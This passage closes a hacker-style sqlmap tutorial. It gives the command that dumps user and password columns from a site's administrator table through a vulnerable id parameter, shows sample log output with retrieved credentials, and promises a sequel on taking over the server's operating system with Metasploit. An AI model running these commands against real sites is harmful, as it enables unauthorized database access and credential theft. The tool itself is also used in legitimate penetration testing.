Table: administrator
[3 Columns]
+-----------+----------------+
| Column    |     Type         |
+-----------+----------------+
| user        | varchar(250) |
| pass         | varchar(250) |
| ID            | int(11)           |
| etc           | varchar(100) |
+-----------+----------------+
....and so it goes on until it is done finding all of the columns and tables for the database you specified with the '-D database1 -T administrator' paramaters earlier...BUT no you may be asking yourself how do we get that precious data out of there?

Like this:
EX: sqlmap -u http://site.com/example.php?id=1 --dump -D database1 -T administrator -C user,pass,id

Results....remember you can check your logs in "output" folder...The results would look something like this:
[18:51:57] [INFO] fetching columns 'user, pass, id' entries for table
'administrator' on database 'database1'
[18:51:57] [INFO] fetching number of columns 'user, pass, id' entries for table 'administrator' on database 'database1'
[18:51:57] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 2
[18:51:57] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 1
[18:51:57] [INFO] retrieved: IhazYOURpassWZORD
[18:52:52] [INFO] retrieved: admin
[18:53:34] [INFO] read from file 'C:\sqlmap-0.8_exe\output\www.site.com\session': 2
[18:53:34] [INFO] retrieved: IhazYOURpassWZORDtoo
[18:54:34] [INFO] retrieved: JohnDoe
Database: database1
Table: administrators
[2 entries]
+-----+---------------------------------+------------+
|   ID |                Password              |    user      |
+-----+---------------------------------+------------+
| 1      | IhazYOURpassWORD     |    admin    |
| 2    | IhazYOURpassWORDtoo | JohnDoe |
+-----+---------------------------------+------------+
[18:55:14] [INFO] Table 'database1.administrator' dumped to CSV file 'C:\sqlmap-0.8_e
xe\output\www.site.com\dump\database1\administrator.csv'
[18:55:14] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.8_exe\out
put\www.site.com'
That sums up our basic introduction to SQLMAP. Ideas for next series...SQLMAP Round 2: From Dumping to Owning the DB Server. Using ninja skills with sqlmap to interact with the system registry and filesystem access, as well as gaining access to the underlying operating system and executing system commands with a little assistance from the incorporation of Metasploit to the attack scenario. I hope you enjoyed this episode and stay tuned for more to come in the next series...

Later - H.R.